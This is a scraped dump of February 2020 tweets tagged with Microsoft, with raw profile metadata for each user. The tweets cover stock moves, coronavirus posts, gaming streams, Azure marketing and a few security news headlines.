    <t>{'id': 1232834730384556034, 'id_str': '1232834730384556034', 'name': 'Bitcoin Billy', 'screen_name': 'BitcoinBilly3', 'location': '', 'description': 'Billy here to save the day.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 8, 'friends_count': 15, 'listed_count': 0, 'created_at': 'Thu Feb 27 01:08:07 +0000 2020', 'favourites_count': 26,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'http://pbs.twimg.com/profile_images/1232841768514793473/-mYtkRS__normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1232841768514793473/-mYtkRS__normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1232834730384556034/1582771410',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</si>
  <si>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05:57:23 +0000 2020</t>
  </si>
  <si>
    <t>Check out Playing Fortnite with KellsGrace  | 117/200 Followers! https://t.co/yCF3AOgQi2 #fortnite #fortniteseason2 #fornitechapter #gaming #streaming #twitch #twitchtv #twitchgamer #twitchcommunity #winning #pc #pcgaming #xbox #microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 05:55:00 +0000 2020</t>
  </si>
  <si>
    <t>Comedy Great Greg Giraldo in the documentary "Laugh Addict" free on Amazon Prime &amp;amp; YouTube. Doc 4 Military, Social Workers, Care-Providers, 12 Step Communities https://t.co/4rBgWzrLey #myhouse #capefear buffalo #horses #mustangs #canton #wifi #jordan #boeing #microsoft #apple</t>
  </si>
  <si>
    <t>{'id': 737344653758988288, 'id_str': '737344653758988288', 'name': 'Recovery', 'screen_name': 'SOAR12steps', 'location': 'Worldwide', 'description': "SOAR, don't be alone anymore! -Our meetings are open to all addictions &amp; mental health diagnoses https://t.co/qPR0VPAO6I READ FREE! #addiction", 'url': 'https://t.co/oOLErW4O5w', 'entities': {'url': {'urls': [{'url': 'https://t.co/oOLErW4O5w', 'expanded_url': 'http://SOAR12steps.org', 'display_url': 'SOAR12steps.org', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/qPR0VPAO6I', 'expanded_url': 'https://www.amazon.com/gp/aw/d/B01GCVM01W', 'display_url': 'amazon.com/gp/aw/d/B01GCVâ€¦', 'indices': [97, 120]}]}}, 'protected': False, 'followers_count': 1414, 'friends_count': 1313, 'listed_count': 226, 'created_at': 'Mon May 30 18:07:19 +0000 2016', 'favourites_count': 898, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 73488, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/952325103114735618/oPmsLoHU_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/952325103114735618/oPmsLoHU_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/737344653758988288/1517196700',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</si>
  <si>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05:53:36 +0000 2020</t>
  </si>
  <si>
    <t>"Worst Thing In My Career" - US Stocks Suffer Fastest Collapse From Record Highs Since Great Depression | https://t.co/92Uja7Opld #barrons #cnbc #bloomberg #thestreet #stocks #bonds #crypto #gold #silver #money #apple #microsoft #amazon #sports #music #nba #nfl #nhl #mlb</t>
  </si>
  <si>
    <t>{'id': 822244212, 'id_str': '822244212', 'name': 'JohnnyB Network', 'screen_name': 'Johnbenitezjr', 'location': 'CALIFORNIA', 'description': 'DO YOUR DD! JUST OPINIONS!, DONATIONS.  \nhttps://t.co/C8tQzCGCtT', 'url': 'https://t.co/8xpPt0h4dk', 'entities': {'url': {'urls': [{'url': 'https://t.co/8xpPt0h4dk', 'expanded_url': 'http://www.mojodaytrading.com/', 'display_url': 'mojodaytrading.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/C8tQzCGCtT', 'expanded_url': 'https://1upcoin.com/donate/youtube/TheJOHNNYBTVchannel', 'display_url': '1upcoin.com/donate/youtubeâ€¦', 'indices': [41, 64]}]}}, 'protected': False, 'followers_count': 1544, 'friends_count': 1814, 'listed_count': 135, 'created_at': 'Thu Sep 13 21:59:15 +0000 2012', 'favourites_count': 20984, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 52349,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'http://pbs.twimg.com/profile_images/525832801744982019/6CqaWKNG_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/525832801744982019/6CqaWKNG_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/822244212/1423949815', 'profile_link_color': '9266CC',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</si>
  <si>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Feb 28 05:53:05 +0000 2020</t>
  </si>
  <si>
    <t>@XHNews One more makeshift hospital is ready in China as thousands Chinese cremated daily.
#CoronaVirus #WuhanCoronavirusOutbreak #CoronavirusOutbreak 
#Starbucks #Apple #Microsoft #Amazon #Tesla #Dell #Honeywell #Qualcomm #Google #Cisco #Intel #HP #GM #Ford #China #XiJinping https://t.co/ChLW37g6RZ</t>
  </si>
  <si>
    <t>Fri Feb 28 05:52:41 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft saw $62 billion of market value erased after it said #coronavirus will hit profits this year. Here are 6 other companies that have issued similar warnings  and how much they've lost -  https://t.co/gvfAuj4QLp</t>
  </si>
  <si>
    <t>{'id': 1182947209, 'id_str': '1182947209', 'name': 'Dennis Koch ðŸ––', 'screen_name': 'DennisKoch10', 'location': 'Edmonton Alberta', 'description': 'Mental Health-LGBTQ Advocate, Paranormal &amp; Trek Geek. Closed minded? Homophobic? Hate politics? - nope. ðŸŽ¬ Assoc. Producer The 7th Rule: A Star Trek Podcast', 'url': 'https://t.co/p6BnwhRWGe', 'entities': {'url': {'urls': [{'url': 'https://t.co/p6BnwhRWGe', 'expanded_url': 'https://www.facebook.com/dennis.koch.790', 'display_url': 'facebook.com/dennis.koch.790', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 7706, 'friends_count': 7926, 'listed_count': 1228, 'created_at': 'Fri Feb 15 15:19:52 +0000 2013', 'favourites_count': 221957, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 705443,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'http://pbs.twimg.com/profile_images/1116964222867365888/FMWG0qFp_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1116964222867365888/FMWG0qFp_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1182947209/1583040779', 'profile_link_color': '061F81',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</si>
  <si>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Feb 28 05:48:32 +0000 2020</t>
  </si>
  <si>
    <t>Rust/WinRT coming soon by Kenny Kerr creator of C++/WinRT https://t.co/YfjMe2owEO #rust #winrt #cplusplus #cpp #Microsoft</t>
  </si>
  <si>
    <t>{'id': 159013540, 'id_str': '159013540', 'name': 'Tiklu Ganguly', 'screen_name': 'tikluganguly', 'location': 'Bengaluru, Karnataka', 'description': 'Curious about all new things in software world. Productivity Junky. Trying to be better version of myself every day. I tweet what I read.', 'url': 'http://t.co/1Ga0U7hNPo', 'entities': {'url': {'urls': [{'url': 'http://t.co/1Ga0U7hNPo', 'expanded_url': 'http://tikluganguly.blogspot.in', 'display_url': 'tikluganguly.blogspot.in', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 659, 'friends_count': 1343, 'listed_count': 107, 'created_at': 'Thu Jun 24 06:29:46 +0000 2010', 'favourites_count': 13578, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 29284,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'http://pbs.twimg.com/profile_images/1196292945/me1_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1196292945/me1_normal.png',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</si>
  <si>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05:47:46 +0000 2020</t>
  </si>
  <si>
    <t>Street naming convention near where I grew up.. 
Aussie animal, Aussie animal, Aussie animal, Cloud platform. 
#Azure #Microsoft #IpswichQld https://t.co/DbuMC9t4DH</t>
  </si>
  <si>
    <t>{'id': 1693510675, 'id_str': '1693510675', 'name': 'Ben Watt', 'screen_name': 'benrebooted', 'location': 'Dublin, Ireland', 'description': '[Life] Family. Triathlon. Forest walks. Laksa. @ballyoganjnrs\n\n[Work] Owner @Datalineo | Microsoft MVP | Leader @DublinPUG  | @DataCeili Core team', 'url': 'https://t.co/lI6PBmXFNA', 'entities': {'url': {'urls': [{'url': 'https://t.co/lI6PBmXFNA', 'expanded_url': 'http://www.datalineo.com', 'display_url': 'datalineo.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 689, 'friends_count': 631, 'listed_count': 25, 'created_at': 'Fri Aug 23 10:32:41 +0000 2013', 'favourites_count': 2553, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2328,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'http://pbs.twimg.com/profile_images/959852306551529472/QXdN68sq_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/959852306551529472/QXdN68sq_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1693510675/1582453566',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</si>
  <si>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05:43:26 +0000 2020</t>
  </si>
  <si>
    <t>Are you joining us at the upcoming Vancouver #SharePoint Saturday event on March 28th? Use the barcode in this post to save your spot now. Space is limited.
#SPSVancouver #SPS_Events #MicrosoftTeams #Microsoft #sharepointonline #Microsoft365 #Office365 #SPSEvent #spscommunity https://t.co/STyyUX3qKG</t>
  </si>
  <si>
    <t>Fri Feb 28 05:40:13 +0000 2020</t>
  </si>
  <si>
    <t>@XHNews #COVID19 outbreak has prompted Chinese to work from home.
Look at #Beijing today.
#CoronaVirus #WuhanCoronavirusOutbreak #CoronavirusOutbreak 
#Starbucks #Apple #Microsoft #Amazon #Tesla #Dell #Honeywell #Qualcomm #Google #Cisco #Intel #HP #GM #Ford #China #XiJinping https://t.co/LtDAWuOXO3</t>
  </si>
  <si>
    <t>Fri Feb 28 05:40:09 +0000 2020</t>
  </si>
  <si>
    <t>Challenge Time: Loading Screens
Can you identify to which games these loading screens belong?
(Full post found here: https://t.co/DKLuMrWy5C )
#WeThePlayers #gamedevelopment #videogames #Sega #Sony #Nintendo #Microsoft #PlayStation #Xbox https://t.co/zSNdfk7Lxy</t>
  </si>
  <si>
    <t>{'id': 2635150053, 'id_str': '2635150053', 'name': 'ðŸ•¹WozburgerðŸ•¹', 'screen_name': 'wleigh85', 'location': 'South Yorkshire', 'description': 'Teacher, Videogame Lover, Freelance Writer/Content Creator, Needs to get out more...â¬†ï¸â¬‡ï¸â¬…ï¸âž¡ï¸ðŸ…°ï¸+start\n\n#WeThePlayers https://t.co/s11MfpM16Z', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/s11MfpM16Z', 'expanded_url': 'https://www.facebook.com/wetheplayer/', 'display_url': 'facebook.com/wetheplayer/', 'indices': [116, 139]}]}}, 'protected': False, 'followers_count': 369, 'friends_count': 1213, 'listed_count': 3, 'created_at': 'Mon Jun 23 18:23:08 +0000 2014', 'favourites_count': 1061, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1334,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'http://pbs.twimg.com/profile_images/1219665511992233985/O8mMwwz0_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1219665511992233985/O8mMwwz0_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2635150053/1579625954',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</si>
  <si>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05:35:54 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Data Science Certification: Power BI A-Z  Hands-On Power BI Training For Data Science!
https://t.co/ZoYlDKSIzz
#AI #Datascience #training #certification #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 05:33:37 +0000 2020</t>
  </si>
  <si>
    <t>@EpochTimes You forgot #Microsoft</t>
  </si>
  <si>
    <t>{'id': 1869716084, 'id_str': '1869716084', 'name': 'ILoveBitcoin', 'screen_name': 'SPC_Bitcoin', 'location': 'Rust Belt', 'description': 'é•·ç”Ÿãè¡ä¸­æœ¬ Who here needs a fresh start?', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1101, 'friends_count': 570, 'listed_count': 177, 'created_at': 'Mon Sep 16 00:40:50 +0000 2013', 'favourites_count': 3397, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 30109, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FCFCFC', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/378800000822397077/4b53222c1ea6c9a7da33f2557e3ccadf_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000822397077/4b53222c1ea6c9a7da33f2557e3ccadf_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1869716084/1379747902', 'profile_link_color': 'BD6F1B',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</si>
  <si>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Feb 28 05:33:27 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft withdraws from GDC gaming conference in March. Coronavirus
#CoronaVirusUpdates 
#microsoft
#GDC2020</t>
  </si>
  <si>
    <t>{'id': 760443331839004672, 'id_str': '760443331839004672', 'name': 'Nishant Arora', 'screen_name': 'nisharotech', 'location': 'New Delhi, India', 'description': '#journalist@indo-asian news service (https://t.co/1JuJl8q5Jo) Covers #TechTrends #Cloud #Cybersecurity Writes weekly column. Tweets genuine', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/1JuJl8q5Jo', 'expanded_url': 'http://www.ians.in', 'display_url': 'ians.in', 'indices': [37, 60]}]}}, 'protected': False, 'followers_count': 427, 'friends_count': 126, 'listed_count': 56, 'created_at': 'Tue Aug 02 11:53:13 +0000 2016', 'favourites_count': 777, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5222,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'http://pbs.twimg.com/profile_images/1195599341483769856/JSJxFdGx_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1195599341483769856/JSJxFdGx_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/760443331839004672/1470193167',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</si>
  <si>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05:33:24 +0000 2020</t>
  </si>
  <si>
    <t>Seduction and Farts? Fable 2 Part 6 https://t.co/EsolZLPKnc
#fable #fable2 #xbox #microsoft #twitch #stream #streamer #videogame #gamer #lionhead #xboxone</t>
  </si>
  <si>
    <t>Fri Feb 28 05:32:16 +0000 2020</t>
  </si>
  <si>
    <t>We had a great time discussing A.I. and tech in education this week at @MicrosoftStore Sydneys Learning Lab. Great discussion from @RayFleming @AlphaBalzer &amp;amp; @ncallaghan1
@microsoft @nsweducation @teachnsw #primarystemchat #artificialintelligence #microsoft #ai #edtech https://t.co/z45u2AVYSt</t>
  </si>
  <si>
    <t>{'id': 1091626644459028480, 'id_str': '1091626644459028480', 'name': 'neuranextaiedu', 'screen_name': 'neuranextaiedu', 'location': 'Sydney, New South Wales', 'description': 'Neuranext provides both in &amp; out of school Artificial Intelligence courses for students &amp; teachers (NESA approved) as well as being a Creative Kids Provider.', 'url': 'https://t.co/ZiL9lV2Huu', 'entities': {'url': {'urls': [{'url': 'https://t.co/ZiL9lV2Huu', 'expanded_url': 'http://www.neuranext.com', 'display_url': 'neuranext.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 196, 'friends_count': 1433, 'listed_count': 2, 'created_at': 'Sat Feb 02 09:17:28 +0000 2019', 'favourites_count': 319, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 267, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1091627537912877056/t3j3NJki_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1091627537912877056/t3j3NJki_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1091626644459028480/1559465013',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</si>
  <si>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05:30:09 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft has taken its first step into penetrating the #RPA market.  https://t.co/qmw4SwQfVi
#Robotics #Automation #IoT #Futureofwork #Digital #Tech</t>
  </si>
  <si>
    <t>{'id': 54317231, 'id_str': '54317231', 'name': 'Arjen van Berkum', 'screen_name': 'arjenvanberkum', 'location': 'Delft NL', 'description': 'COO @ Anothermonday | Columnist &amp; speaker | Motivator | lives Automation and AI | Delft | #Innovation | #disruption | #CDO | #RPA', 'url': 'https://t.co/I07nsCRfZA', 'entities': {'url': {'urls': [{'url': 'https://t.co/I07nsCRfZA', 'expanded_url': 'http://www.arjenvanberkum.nl', 'display_url': 'arjenvanberkum.nl', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 35423, 'friends_count': 26366, 'listed_count': 2820, 'created_at': 'Mon Jul 06 20:10:41 +0000 2009', 'favourites_count': 7084, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 51836,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'http://pbs.twimg.com/profile_images/627125933800075264/gtLxqzzN_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/627125933800075264/gtLxqzzN_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/54317231/1579452525', 'profile_link_color': 'EB1818',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</si>
  <si>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05:27:10 +0000 2020</t>
  </si>
  <si>
    <t>How to grow your business with the new #commerce experience for #Azure in the #CSP program? https://t.co/c69ccSc19k #microsoft</t>
  </si>
  <si>
    <t>{'id': 1533468792, 'id_str': '1533468792', 'name': 'Jyotsana Gupta', 'screen_name': 'jyotsana710', 'location': 'Global', 'description': 'Group Editor @DailyHostNews @Wire19s | Varied interests - #News | #Tech | #Cloud | #AI | #IoT| #Robotics| #DT | ðŸŒ', 'url': 'https://t.co/LiRGn5QHq6', 'entities': {'url': {'urls': [{'url': 'https://t.co/LiRGn5QHq6', 'expanded_url': 'https://wire19.com/', 'display_url': 'wire19.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 742, 'friends_count': 757, 'listed_count': 8, 'created_at': 'Thu Jun 20 10:06:01 +0000 2013', 'favourites_count': 4676, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2470,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'http://pbs.twimg.com/profile_images/1222390116632498178/sedx3clr_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1222390116632498178/sedx3clr_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1533468792/1529040604',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</si>
  <si>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05:23:46 +0000 2020</t>
  </si>
  <si>
    <t>@realDonaldTrump Coronavirus is Made in China.  But please No worry.
#CoronaVirus #WuhanCoronavirusOutbreak #CoronavirusOutbreak 
#Starbucks #Apple #Microsoft #Amazon #Tesla #Dell #Honeywell #Qualcomm #Google #Cisco #Intel #HP #GM #Ford #China #XiJinping https://t.co/GvwH252v3T</t>
  </si>
  <si>
    <t>Fri Feb 28 05:21:09 +0000 2020</t>
  </si>
  <si>
    <t>You want to buy #facebook the stock on a correction? Dont forget that #microsoft in 2000 and 2007 corrected 75% and 50% down. And Facebook has only corrected 14% since its high. Plenty more to go.</t>
  </si>
  <si>
    <t>{'id': 2310575844, 'id_str': '2310575844', 'name': 'ETF Business Review ðŸ‘©\u200dðŸ‘©\u200dðŸ‘§\u200dðŸ‘§', 'screen_name': 'ETFBizReview', 'location': 'New York NY ðŸ‡ºðŸ‡¸', 'description': '#1 award winning newsletter searching for good investments, stocks, ETFs and trends sweeping our lives. Click and follow us. #ETFs #stocks #biz #bitcoin', 'url': 'https://t.co/HTFY2zMC07', 'entities': {'url': {'urls': [{'url': 'https://t.co/HTFY2zMC07', 'expanded_url': 'http://ok.com', 'display_url': 'ok.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 350, 'friends_count': 167, 'listed_count': 20, 'created_at': 'Sat Jan 25 19:19:26 +0000 2014', 'favourites_count': 427, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3861,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'http://pbs.twimg.com/profile_images/1042324825744834560/N0VOswwl_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1042324825744834560/N0VOswwl_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2310575844/1497057619',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</si>
  <si>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05:20:56 +0000 2020</t>
  </si>
  <si>
    <t>The updated version of SolzEditor-HTML editor add-on for Dynamics 365 CRM gives you the freedom to use local images from your Desktop in your email templates. 
https://t.co/TQjhatUpD5
#SolzEditor #MSDyn365 #Microsoft #Soluzione #updated https://t.co/iCkxZKlczn</t>
  </si>
  <si>
    <t>Fri Feb 28 05:20:17 +0000 2020</t>
  </si>
  <si>
    <t>The updated version of SolzEditor-HTML editor add-on for Dynamics 365 CRM gives you the freedom to use local images from your Desktop in your email templates. 
https://t.co/Xf8pA11iN4
#SolzEditor #MSDyn365 #Microsoft #Soluzione #updated https://t.co/qcvxQi6udQ</t>
  </si>
  <si>
    <t>Fri Feb 28 05:10:06 +0000 2020</t>
  </si>
  <si>
    <t>#K12Education Market Segmentation: Marketwatch @ #ChungdahmLearning, #Dell, #NextEducation, #Samsung, #TALEducationGroup, #AdobeSystems, #Blackboard, #BenQ, #CengageLearning, #Ellucian, #IBM, #Intel, #McmillanLearning, #Microsoft, #Oracle @ https://t.co/Yx86bG7rJt</t>
  </si>
  <si>
    <t>{'id': 801769122291806208, 'id_str': '801769122291806208', 'name': 'Stephano Kelley', 'screen_name': 'stephanokelley6', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 100, 'friends_count': 608, 'listed_count': 2, 'created_at': 'Thu Nov 24 12:47:09 +0000 2016', 'favourites_count': 39, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3627, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/973071297935822848/o3oM4aV5_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/973071297935822848/o3oM4aV5_normal.jpg',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</si>
  <si>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05:09:18 +0000 2020</t>
  </si>
  <si>
    <t>Troubleshooting Office Cloud Policy Service (OCPS) https://t.co/4hjfksboI6 #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 05:05:07 +0000 2020</t>
  </si>
  <si>
    <t>Fileless attack detection for Linux in preview https://t.co/ZCvdPAV7Ma #cloud #microsoft #azure</t>
  </si>
  <si>
    <t>Fri Feb 28 05:04:16 +0000 2020</t>
  </si>
  <si>
    <t>#Hackers Scanning for #Vulnerable #Microsoft #Exchange Servers, Patch Now! https://t.co/rmKlHSIYTQ</t>
  </si>
  <si>
    <t>{'id': 84235436, 'id_str': '84235436', 'name': 'Angry CPU', 'screen_name': 'AngryCPU', 'location': 'rw rw rw', 'description': 'Computer Information Technology Geek; Networking and Security, IT Admin. Forensics are most interesting; unique.Malware St4lk3r', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 8281, 'friends_count': 9101, 'listed_count': 946, 'created_at': 'Thu Oct 22 03:59:15 +0000 2009', 'favourites_count': 9384, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 37776,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'http://pbs.twimg.com/profile_images/1204135940886867968/PmTcfiMy_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1204135940886867968/PmTcfiMy_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/84235436/1437805868', 'profile_link_color': '1B95E0',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</si>
  <si>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Fri Feb 28 04:55:43 +0000 2020</t>
  </si>
  <si>
    <t>Today was a good day.
I taught MS Word two new words, so it doesn't have to struggle with them anymore and leaves it to us, mortals.
#Microsoft #MSWord #English #language #dictionary #technology #spellcheck #intersentential #intrasentential https://t.co/GigwDpijJe</t>
  </si>
  <si>
    <t>{'id': 2597015652, 'id_str': '2597015652', 'name': 'Krzysztof Borowski ðŸ—¨ï¸ðŸ’»ðŸ§˜\u200dâ™‚ï¸', 'screen_name': 'brwski', 'location': 'United States', 'description': 'Language//technology\n\nSentiment analysis, user-generated discourse, NLP projects for Polish, multilingual data, language QA. Views mine. #NLP #NLProc #langtech', 'url': 'https://t.co/Nk8Y2H2ulN', 'entities': {'url': {'urls': [{'url': 'https://t.co/Nk8Y2H2ulN', 'expanded_url': 'http://linkedin.com/in/brwski', 'display_url': 'linkedin.com/in/brwski', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 255, 'friends_count': 339, 'listed_count': 25, 'created_at': 'Mon Jun 30 23:00:04 +0000 2014', 'favourites_count': 962, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 962, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': True, 'profile_background_color': '000000', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1233259653280280576/hjnmam0U_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1233259653280280576/hjnmam0U_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2597015652/1573713659', 'profile_link_color': '40E0D0',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</si>
  <si>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Fri Feb 28 04:55:02 +0000 2020</t>
  </si>
  <si>
    <t>Fri Feb 28 04:49:24 +0000 2020</t>
  </si>
  <si>
    <t>$MSFT : Below $181 now touched down target. #Microsoft #Corp. https://t.co/B0XNJUaHAj</t>
  </si>
  <si>
    <t>{'id': 763412134495522820, 'id_str': '763412134495522820', 'name': 'Mind Trader', 'screen_name': 'mindandtrading', 'location': 'Global', 'description': 'Professional Harmonic and Wave Trader, trading CRYPTO &amp; FOREX, DM me to join my TELEGRAM Channel,Tweets are not investment advice. https://t.co/EgRsxvXd3I', 'url': 'https://t.co/jrobhLJF7p', 'entities': {'url': {'urls': [{'url': 'https://t.co/jrobhLJF7p', 'expanded_url': 'http://t.me/MindTrader', 'display_url': 't.me/MindTrader', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/EgRsxvXd3I', 'expanded_url': 'http://youtube.com/c/MindTrader', 'display_url': 'youtube.com/c/MindTrader', 'indices': [131, 154]}]}}, 'protected': False, 'followers_count': 25171, 'friends_count': 200, 'listed_count': 721, 'created_at': 'Wed Aug 10 16:30:11 +0000 2016', 'favourites_count': 11397, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 7103,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'http://pbs.twimg.com/profile_images/1206959226339377152/8cvKR-JP_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1206959226339377152/8cvKR-JP_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/763412134495522820/1543935326',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</si>
  <si>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04:46:04 +0000 2020</t>
  </si>
  <si>
    <t>ETL in the Cloud is Made Easy Together with Azure Data Factory and Azure Databricks 
https://t.co/F3ewyAkc7V 
#Microsoft #cloud #azure #data #Databricks #digitaltransformation #technology #dataflow #issquared https://t.co/N9Jj3ogAKj</t>
  </si>
  <si>
    <t>Fri Feb 28 04:44:03 +0000 2020</t>
  </si>
  <si>
    <t>Inspired and energized! Work never ends and productivity is all but swell! #MSFTPartner #MSP #Microsoft #RedBull #MSPInspire @MSPInspire https://t.co/apJw3ZUmAW</t>
  </si>
  <si>
    <t>{'id': 3012754405, 'id_str': '3012754405', 'name': 'Usman Aslam', 'screen_name': 'usmanaslam712', 'location': '', 'description': 'Beta Microsoft Student Partner @Microsoft, Strategic Lead @gdgcloudISB, Tech Enthusiast, Writer, Blogger', 'url': 'https://t.co/2o7FkJc7wo', 'entities': {'url': {'urls': [{'url': 'https://t.co/2o7FkJc7wo', 'expanded_url': 'http://www.freshmanphilosopher.wordpress.com', 'display_url': 'freshmanphilosopher.wordpress.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 76, 'friends_count': 803, 'listed_count': 0, 'created_at': 'Sat Feb 07 20:44:44 +0000 2015', 'favourites_count': 42, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 132,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'http://pbs.twimg.com/profile_images/995570862303711233/NNPX2GBE_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/995570862303711233/NNPX2GBE_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3012754405/1582453553', 'profile_link_color': 'ABB8C2',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</si>
  <si>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Feb 28 04:32:11 +0000 2020</t>
  </si>
  <si>
    <t>Coming soon to your favorite smart assistant device apple @itunesmusic @applemusic microsoft alexa99 @nest google googlemaps #alexa99 #amazon #siri #apple #Microsoft #voice #assistant #smart #device @ Ryan C Hernandez https://t.co/JDaOwypsV7</t>
  </si>
  <si>
